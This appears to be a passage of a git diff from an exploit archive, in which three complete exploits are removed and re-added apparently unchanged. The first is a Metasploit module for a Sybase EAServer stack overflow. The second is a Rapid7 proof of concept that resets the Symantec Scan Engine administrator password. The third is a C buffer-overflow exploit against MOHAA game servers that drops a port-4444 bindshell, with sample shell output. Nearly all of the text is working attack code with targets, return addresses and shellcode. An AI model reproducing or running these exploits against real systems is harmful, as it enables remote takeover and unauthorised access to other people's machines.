$s->GetError ); - return; - } - - - my $crash = Pex::Text::AlphaNumText(5000); - - substr($crash, $target->[2] - 4, 2, "\xeb\x06"); - substr($crash, $target->[2] , 4, pack("V", $target->[1])); - substr($crash, $target->[2] + 4, length($shellcode), $shellcode); - - $dir = $dir . "Login.jsp?" . $crash; - - my $request = - "GET $dir HTTP/1.1\r\n". - "Accept: */*\r\n". - "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". - "Host: $target_host:$target_port\r\n". - "Connection: Close\r\n". - "\r\n"; - - $s->Send($request); - - $self->PrintLine("[*] Overflow request sent, sleeping for four seconds"); - select(undef, undef, undef, 4); - - $self->Handler($s); - return; -} - -1; - -# milw0rm.com [2006-04-15] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. 
In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. +## + +package Msf::Exploit::sybase_easerver; +use strict; +use base "Msf::Exploit"; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'Sybase EAServer 5.2 Remote Stack Overflow', + 'Version' => '$Revision: 1.4 $', + 'Authors' => [ 'anonymous' ], + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ], + 'Priv' => 1, + + 'AutoOpts' => + { + 'EXITFUNC' => 'thread' + }, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 8080 ], + 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], + 'DIR' => [1, 'DATA', 'Directory of Login.jsp script', '/WebConsole/'], + 'SSL' => [0, 'BOOL', 'Use SSL'], + }, + + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%", + 'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy + 'Keys' => ['+ws2ord'], + }, + + 'Description' => Pex::Text::Freeform(qq{ + This module exploits a stack overflow in the Sybase EAServer Web + Console. The offset to the SEH frame appears to change depending + on what version of Java is in use by the remote server, making this + exploit somewhat unreliable. +}), + + 'Refs' => + [ + ['BID', 14287], + ], + + 'Targets' => + [ + # Technically we could combine these into a single multi-return string... 
+ [ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', 0x6d4548ff, 3820], + [ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', 0x6d4548ff, 3841], + [ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', 0x08041b25, 3912], + [ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', 0x08041b25, 3925], + ], + + 'Keys' => ['easerver'], + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $dir = $self->GetVar('DIR'); + my $target = $self->Targets->[$target_idx]; + + $self->PrintLine( "[*] Attempting to exploit " . $target->[0] ); + + my $s = Msf::Socket::Tcp->new( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'SSL' => $self->GetVar('SSL'), + ); + + if ( $s->IsError ) { + $self->PrintLine( '[*] Error creating socket: ' . $s->GetError ); + return; + } + + + my $crash = Pex::Text::AlphaNumText(5000); + + substr($crash, $target->[2] - 4, 2, "\xeb\x06"); + substr($crash, $target->[2] , 4, pack("V", $target->[1])); + substr($crash, $target->[2] + 4, length($shellcode), $shellcode); + + $dir = $dir . "Login.jsp?" . $crash; + + my $request = + "GET $dir HTTP/1.1\r\n". + "Accept: */*\r\n". + "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n". + "Host: $target_host:$target_port\r\n". + "Connection: Close\r\n". + "\r\n"; + + $s->Send($request); + + $self->PrintLine("[*] Overflow request sent, sleeping for four seconds"); + select(undef, undef, undef, 4); + + $self->Handler($s); + return; +} + +1; + +# milw0rm.com [2006-04-15] diff --git a/platforms/windows/remote/1703.pl b/platforms/windows/remote/1703.pl index b905f85c8..52db8b58d 100755 --- a/platforms/windows/remote/1703.pl +++ b/platforms/windows/remote/1703.pl 
@@ -1,243 +1,243 @@ -#!/usr/bin/perl -w -# -# Remotely change the administrator password (or password hash) of -# Symantec Scan Engine. -# -# Author: Marc Bevand of Rapid7 -# Copyright 2006 Rapid7, LLC. All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions -# are met: -# -# 1. Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# -# 2. Redistributions in binary form must reproduce the above -# copyright notice, this list of conditions and the following -# disclaimer in the documentation and/or other materials provided -# with the distribution. -# -# THIS SOFTWARE IS PROVIDED BY RAPID7, LLC ``AS IS'' AND ANY EXPRESS -# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE -# ARE DISCLAIMED. IN NO EVENT SHALL RAPID7, LLC BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL -# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE -# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS -# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, -# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING -# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -# - -use strict; -use Getopt::Long; -use LWP::UserAgent; -use Digest::MD5 qw/md5_hex/; -use Net::SSLeay::Handle qw/shutdown/; - -# -# Init LWP::UserAgent (the user agent string is the one currently used -# by the Scan Engine java applet). 
-# -sub init { - my $ua; - $ua = LWP::UserAgent->new(keep_alive => 0); - $ua->agent("Mozilla/4.0 (Windows 2000 5.0) Java/1.4.2_08"); - return $ua; -} - -# -# Example of service string to be parsed: -# 10.68.4.4 -# 10.68.4.4/8004/8005 -# hostname -# hostname/9004/9005 -# -sub parse_service { - my ($service) = @_; - - if ($service =~ m{^([^/]*)/(\d+)/(\d+)$}) { - return $1, $2, $3; - } elsif ($service =~ m{^([^/]*)$}) { - return $1, 8004, 8005; - } else { - die "cannot parse service: $service"; - } -} - -# -# Sends a request to obtain the password hash. Note: the RSA key -# (modulus and public exponent) has been randomly chosen. -# -sub data_to_send { - my $r1 = - 'I need the key' - ; - - return $r1; -} - -# -# Example of response to be parsed: -# -# -# -# -# -sub parse_resp { - my ($res) = @_; - - if ($res =~ /pass="([[:xdigit:]]{64})"/) { - return $1; - } else { - die "cannot parse response: $res"; - } -} - -# -# Return a password hash. -# -sub hash_passwd { - my ($pwd) = @_; - my $salt = sprintf "%08X%08X%08X%08X", rand(0xffffffff), - rand(0xffffffff), rand(0xffffffff), rand(0xffffffff); - - return uc(md5_hex("$pwd$salt")) . $salt; -} - -sub send_request { - my ($socket, $req) = @_; - - $req = pack("n", length($req)).$req; - print $socket $req; -} - -# -# Set the administrator password hash. -# -sub set_hash { - my ($hostname, $port_ssl, $hash) = @_; - my $socket; - my $reply; - - tie(*SSL, "Net::SSLeay::Handle", $hostname, $port_ssl) - or die "ssl tie: $!"; - $socket = \*SSL; - send_request($socket, - ''. - ''. - ''. - ''. - ''. 
- ']]>'); - send_request($socket, - 'UTFWritesDone'); - shutdown($socket, 1) or die "ssl shutdown: $!"; - $reply = substr(<$socket>, 2); - $reply = substr($reply, 0, index($reply, 'UTFWritesDone') - 2); - if ($reply !~ m{Apply!}) - { - die "command failed: $reply"; - } - close($socket) or die "ssl close: $!"; -} - -sub doit { - my ($service, $pwd, $hash) = @_; - my $hostname; - my $port_http; - my $port_ssl; - my $ua; - my $url; - my $req; - my $res; - my $old_hash; - - ($hostname, $port_http, $port_ssl) = parse_service($service); - $ua = init(); - $url = "http://$hostname:$port_http/xml.xml"; - $req = HTTP::Request->new(POST => $url); - $req->content_type('application/x-www-form-urlencoded'); - $req->content(data_to_send()); - $res = $ua->request($req); - $res->is_success or die "got ".$res->status_line." for $url\n"; - ($old_hash) = parse_resp($res->content); - print "Old hash: $old_hash\n"; - if ($hash) { - set_hash($hostname, $port_ssl, $hash); - print "New hash: $hash\n"; - } else { - $hash = hash_passwd($pwd); - set_hash($hostname, $port_ssl, $hash); - print "New hash: $hash\n"; - print "Password successfully set to: '$pwd'\n"; - } -} - -sub error { - print STDERR "Try `$0 --help' for more information.\n"; -} - -sub usage { - print "Usage:\n". - " $0 [OPTIONS] \n". - " $0 [OPTIONS] //\n". - "Options:\n". - " --help Display this help\n". - " --pwd Set the password (default: test)\n". - " --hash Set the password hash instead of a parti". - "cular password\n". - "Examples:\n". - " $0 10.68.4.4\n". - " $0 --pwd foobar 10.68.4.4/8004/8005\n". 
- ""; -} - -sub main { - my $help; - my $pwd = "test"; - my $hash; - my $service; - - if (!GetOptions( - "help" => \$help, - "pwd=s" => \$pwd, - "hash=s" => \$hash, - )) { - error(); exit(1); - } - if ($help) { - usage(); exit(0); - } - if (!scalar(@ARGV)) { - print STDERR "No service specified.\n"; - error(); exit(1); - } elsif (1 == scalar(@ARGV)) { - $service = $ARGV[0]; - } else { - print STDERR "Extra argument: $ARGV[1]\n"; - error(); exit(1); - } - doit($service, $pwd, $hash); -} - -main(); - -# -# END proof of concept -# - -# milw0rm.com [2006-04-21] +#!/usr/bin/perl -w +# +# Remotely change the administrator password (or password hash) of +# Symantec Scan Engine. +# +# Author: Marc Bevand of Rapid7 +# Copyright 2006 Rapid7, LLC. All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions +# are met: +# +# 1. Redistributions of source code must retain the above copyright +# notice, this list of conditions and the following disclaimer. +# +# 2. Redistributions in binary form must reproduce the above +# copyright notice, this list of conditions and the following +# disclaimer in the documentation and/or other materials provided +# with the distribution. +# +# THIS SOFTWARE IS PROVIDED BY RAPID7, LLC ``AS IS'' AND ANY EXPRESS +# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. 
IN NO EVENT SHALL RAPID7, LLC BE LIABLE FOR ANY +# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE +# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, +# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +# + +use strict; +use Getopt::Long; +use LWP::UserAgent; +use Digest::MD5 qw/md5_hex/; +use Net::SSLeay::Handle qw/shutdown/; + +# +# Init LWP::UserAgent (the user agent string is the one currently used +# by the Scan Engine java applet). +# +sub init { + my $ua; + $ua = LWP::UserAgent->new(keep_alive => 0); + $ua->agent("Mozilla/4.0 (Windows 2000 5.0) Java/1.4.2_08"); + return $ua; +} + +# +# Example of service string to be parsed: +# 10.68.4.4 +# 10.68.4.4/8004/8005 +# hostname +# hostname/9004/9005 +# +sub parse_service { + my ($service) = @_; + + if ($service =~ m{^([^/]*)/(\d+)/(\d+)$}) { + return $1, $2, $3; + } elsif ($service =~ m{^([^/]*)$}) { + return $1, 8004, 8005; + } else { + die "cannot parse service: $service"; + } +} + +# +# Sends a request to obtain the password hash. Note: the RSA key +# (modulus and public exponent) has been randomly chosen. +# +sub data_to_send { + my $r1 = + 'I need the key' + ; + + return $r1; +} + +# +# Example of response to be parsed: +# +# +# +# +# +sub parse_resp { + my ($res) = @_; + + if ($res =~ /pass="([[:xdigit:]]{64})"/) { + return $1; + } else { + die "cannot parse response: $res"; + } +} + +# +# Return a password hash. +# +sub hash_passwd { + my ($pwd) = @_; + my $salt = sprintf "%08X%08X%08X%08X", rand(0xffffffff), + rand(0xffffffff), rand(0xffffffff), rand(0xffffffff); + + return uc(md5_hex("$pwd$salt")) . 
$salt; +} + +sub send_request { + my ($socket, $req) = @_; + + $req = pack("n", length($req)).$req; + print $socket $req; +} + +# +# Set the administrator password hash. +# +sub set_hash { + my ($hostname, $port_ssl, $hash) = @_; + my $socket; + my $reply; + + tie(*SSL, "Net::SSLeay::Handle", $hostname, $port_ssl) + or die "ssl tie: $!"; + $socket = \*SSL; + send_request($socket, + ''. + ''. + ''. + ''. + ''. + ']]>'); + send_request($socket, + 'UTFWritesDone'); + shutdown($socket, 1) or die "ssl shutdown: $!"; + $reply = substr(<$socket>, 2); + $reply = substr($reply, 0, index($reply, 'UTFWritesDone') - 2); + if ($reply !~ m{Apply!}) + { + die "command failed: $reply"; + } + close($socket) or die "ssl close: $!"; +} + +sub doit { + my ($service, $pwd, $hash) = @_; + my $hostname; + my $port_http; + my $port_ssl; + my $ua; + my $url; + my $req; + my $res; + my $old_hash; + + ($hostname, $port_http, $port_ssl) = parse_service($service); + $ua = init(); + $url = "http://$hostname:$port_http/xml.xml"; + $req = HTTP::Request->new(POST => $url); + $req->content_type('application/x-www-form-urlencoded'); + $req->content(data_to_send()); + $res = $ua->request($req); + $res->is_success or die "got ".$res->status_line." for $url\n"; + ($old_hash) = parse_resp($res->content); + print "Old hash: $old_hash\n"; + if ($hash) { + set_hash($hostname, $port_ssl, $hash); + print "New hash: $hash\n"; + } else { + $hash = hash_passwd($pwd); + set_hash($hostname, $port_ssl, $hash); + print "New hash: $hash\n"; + print "Password successfully set to: '$pwd'\n"; + } +} + +sub error { + print STDERR "Try `$0 --help' for more information.\n"; +} + +sub usage { + print "Usage:\n". + " $0 [OPTIONS] \n". + " $0 [OPTIONS] //\n". + "Options:\n". + " --help Display this help\n". + " --pwd Set the password (default: test)\n". + " --hash Set the password hash instead of a parti". + "cular password\n". + "Examples:\n". + " $0 10.68.4.4\n". + " $0 --pwd foobar 10.68.4.4/8004/8005\n". 
+ ""; +} + +sub main { + my $help; + my $pwd = "test"; + my $hash; + my $service; + + if (!GetOptions( + "help" => \$help, + "pwd=s" => \$pwd, + "hash=s" => \$hash, + )) { + error(); exit(1); + } + if ($help) { + usage(); exit(0); + } + if (!scalar(@ARGV)) { + print STDERR "No service specified.\n"; + error(); exit(1); + } elsif (1 == scalar(@ARGV)) { + $service = $ARGV[0]; + } else { + print STDERR "Extra argument: $ARGV[1]\n"; + error(); exit(1); + } + doit($service, $pwd, $hash); +} + +main(); + +# +# END proof of concept +# + +# milw0rm.com [2006-04-21] diff --git a/platforms/windows/remote/1776.c b/platforms/windows/remote/1776.c index 94b049222..0eeed97b3 100755 --- a/platforms/windows/remote/1776.c +++ b/platforms/windows/remote/1776.c 
@@ -1,188 +1,188 @@
-/*
-MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
-Written by RunningBon
-
-Please use this responsibly, as I am not responsible for any damage you cause by using it.
-
-IRC: irc.rizon.net #kik
-E-mail: runningbon@gmail.com
-
-Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
-
-Example:
-
-C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
-MoHAA Server Buffer overflow exploit
-Written by RunningBon
-E-Mail: runningbon@gmail.com
-IRC: irc.rizon.net #kik
-
-Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
-Building packet.
-Sending packet.
-Packet sent.
-Check for your shell on port 4444.
-
-C:\>telnet 192.168.2.44 4444
-Microsoft Windows XP [Version 5.1.2600]
-(C) Copyright 1985-2001 Microsoft Corp.
-
-C:\Program Files\EA GAMES\MOHAA>
-*/
-#include 
-#include 
-
-struct VersionStruct {
- char *pName;
- DWORD dwNewEIP;
- DWORD dwFillLength;
-};
-
-VersionStruct Versions[] = {
- "MOHAA-v1.11", 0xCBB935, 516,
- "MOHAA:S-v2.15", 0x923575, 516,
- //Add MOHAA:Breakthrough support
-};
-
-#pragma comment (lib, "ws2_32.lib")
-
-//Port 4444 bindshell
-unsigned char szShellcode[] =
-"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
-"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
-"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
-"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
-"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
-"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
-"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
-"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
-"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
-"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
-"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
-"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
-"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
-"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
-"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
-"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
-"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
-"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
-"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
-"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
-"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
-"\x11\x13\x38\x7e\x92\xec\xee\x81";
-
-void Error(char *pString)
-{
- printf("[ERROR] %s\n", pString);
- ExitProcess(0);
-}
-
-int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
-{
- WSAData WSADATA;
- SOCKET Socket = NULL;
- sockaddr_in SockAddr;
- char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
- char szBuffer[4096];
- int iLen = 0;
-
- WSAStartup(MAKEWORD(1, 1), &WSADATA);
-
- if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
- {
- Error("socket()");
- return 0;
- }
-
- SockAddr.sin_addr.s_addr = inet_addr(pIP);
- SockAddr.sin_port = htons(iPort);
- SockAddr.sin_family = AF_INET;
-
- printf("Building packet.\n");
-
- memset(szBuffer, 0, sizeof(szBuffer));
-
- memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
- iLen += sizeof(szHeader) - 1;
-
- memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
- iLen += pVersion->dwFillLength;
-
- memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
- iLen += sizeof(DWORD);
-
- memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
- iLen += sizeof(szShellcode);
-
- printf("Sending packet.\n");
-
- if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
- {
- Error("sendto()");
- return 0;
- }
-
- printf("Packet sent.\n");
-
- return 1;
-}
-
-void PrintWelcome()
-{
- printf(
- "MoHAA Server Buffer overflow exploit\n"
- "Written by RunningBon\n"
- "E-Mail: runningbon@gmail.com\n"
- "IRC: irc.rizon.net #kik\n"
- "\n"
- );
-}
-
-void PrintUsage(char *pPath)
-{
- printf("Usage: %s \n\n", pPath);
-
- printf("Supported Version List:\n");
- for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
- {
- printf("%s\n", Versions[i].pName);
- }
-}
-
-int main(int argc, char **argv)
-{
- VersionStruct *pVersion = NULL;
-
- PrintWelcome();
-
- if(argc < 4)
- {
- PrintUsage(argv[0]);
- return 0;
- }
-
- for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
- {
- if(!stricmp(argv[3], Versions[i].pName))
- {
- pVersion = &Versions[i];
- break;
- }
- }
-
- if(pVersion == NULL)
- {
- Error("Invalid version.");
- }
-
- printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);
-
- if(Exploit(argv[1], atoi(argv[2]), pVersion))
- {
- printf("Check for your shell on port 4444.\n");
- }
-
- return 0;
-}
-
-// milw0rm.com [2006-05-10]
+/*
+MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
+Written by RunningBon
+
+Please use this responsibly, as I am not responsible for any damage you cause by using it.
+
+IRC: irc.rizon.net #kik
+E-mail: runningbon@gmail.com
+
+Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
+
+Example:
+
+C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
+MoHAA Server Buffer overflow exploit
+Written by RunningBon
+E-Mail: runningbon@gmail.com
+IRC: irc.rizon.net #kik
+
+Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
+Building packet.
+Sending packet.
+Packet sent.
+Check for your shell on port 4444.
+
+C:\>telnet 192.168.2.44 4444
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Program Files\EA GAMES\MOHAA>
+*/
+#include 
+#include 
+
+struct VersionStruct {
+ char *pName;
+ DWORD dwNewEIP;
+ DWORD dwFillLength;
+};
+
+VersionStruct Versions[] = {
+ "MOHAA-v1.11", 0xCBB935, 516,
+ "MOHAA:S-v2.15", 0x923575, 516,
+ //Add MOHAA:Breakthrough support
+};
+
+#pragma comment (lib, "ws2_32.lib")
+
+//Port 4444 bindshell
+unsigned char szShellcode[] =
+"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
+"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
+"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
+"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
+"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
+"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
+"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
+"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
+"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
+"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
+"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
+"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
+"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
+"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
+"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
+"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
+"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
+"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
+"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
+"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
+"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
+"\x11\x13\x38\x7e\x92\xec\xee\x81";
+
+void Error(char *pString)
+{
+ printf("[ERROR] %s\n", pString);
+ ExitProcess(0);
+}
+
+int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
+{
+ WSAData WSADATA;
+ SOCKET Socket = NULL;
+ sockaddr_in SockAddr;
+ char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
+ char szBuffer[4096];
+ int iLen = 0;
+
+ WSAStartup(MAKEWORD(1, 1), &WSADATA);
+
+ if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
+ {
+ Error("socket()");
+ return 0;
+ }
+
+ SockAddr.sin_addr.s_addr = inet_addr(pIP);
+ SockAddr.sin_port = htons(iPort);
+ SockAddr.sin_family = AF_INET;
+
+ printf("Building packet.\n");
+
+ memset(szBuffer, 0, sizeof(szBuffer));
+
+ memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
+ iLen += sizeof(szHeader) - 1;
+
+ memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
+ iLen += pVersion->dwFillLength;
+
+ memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
+ iLen += sizeof(DWORD);
+
+ memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
+ iLen += sizeof(szShellcode);
+
+ printf("Sending packet.\n");
+
+ if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
+ {
+ Error("sendto()");
+ return 0;
+ }
+
+ printf("Packet sent.\n");
+
+ return 1;
+}
+
+void PrintWelcome()
+{
+ printf(
+ "MoHAA Server Buffer overflow exploit\n"
+ "Written by RunningBon\n"
+ "E-Mail: runningbon@gmail.com\n"
+ "IRC: irc.rizon.net #kik\n"
+ "\n"
+ );
+}
+
+void PrintUsage(char *pPath)
+{
+ printf("Usage: %s \n\n", pPath);
+
+ printf("Supported Version List:\n");
+ for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
+ {
+ printf("%s\n", Versions[i].pName);
+ }
+}
+
+int main(int argc, char **argv)
+{
+ VersionStruct *pVersion = NULL;
+
+ PrintWelcome();
+
+ if(argc < 4)
+ {
+ PrintUsage(argv[0]);
+ return 0;
+ }
+
+ for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
+ {
+ if(!stricmp(argv[3], Versions[i].pName))
+ {
+ pVersion = &Versions[i];
+ break;
+ }
+ }
+
+ if(pVersion == NULL)
+ {
+ Error("Invalid version.");
+ }
+
+ printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);
+
+ if(Exploit(argv[1], atoi(argv[2]), pVersion))
+ {
+ printf("Check for your shell on port 4444.\n");
+ }
+
+ return 0;
+}
+
+// milw0rm.com [2006-05-10]
diff --git a/platforms/windows/remote/20.txt b/platforms/windows/remote/20.txt
index 58a936a5d..67232b830 100755
--- a/platforms/windows/remote/20.txt
+++ b/platforms/windows/remote/20.txt
@@ -313,6 +313,6 @@ extern pstring global_myname; + int am_parent = 1; -/* the last message the was processed */ - -# milw0rm.com [2003-04-25] +/* the last message the was processed */ + +# milw0rm.com [2003-04-25]
diff --git a/platforms/windows/remote/2070.pl b/platforms/windows/remote/2070.pl
index ea073ba59..caa827cdc 100755
--- a/platforms/windows/remote/2070.pl
+++ b/platforms/windows/remote/2070.pl
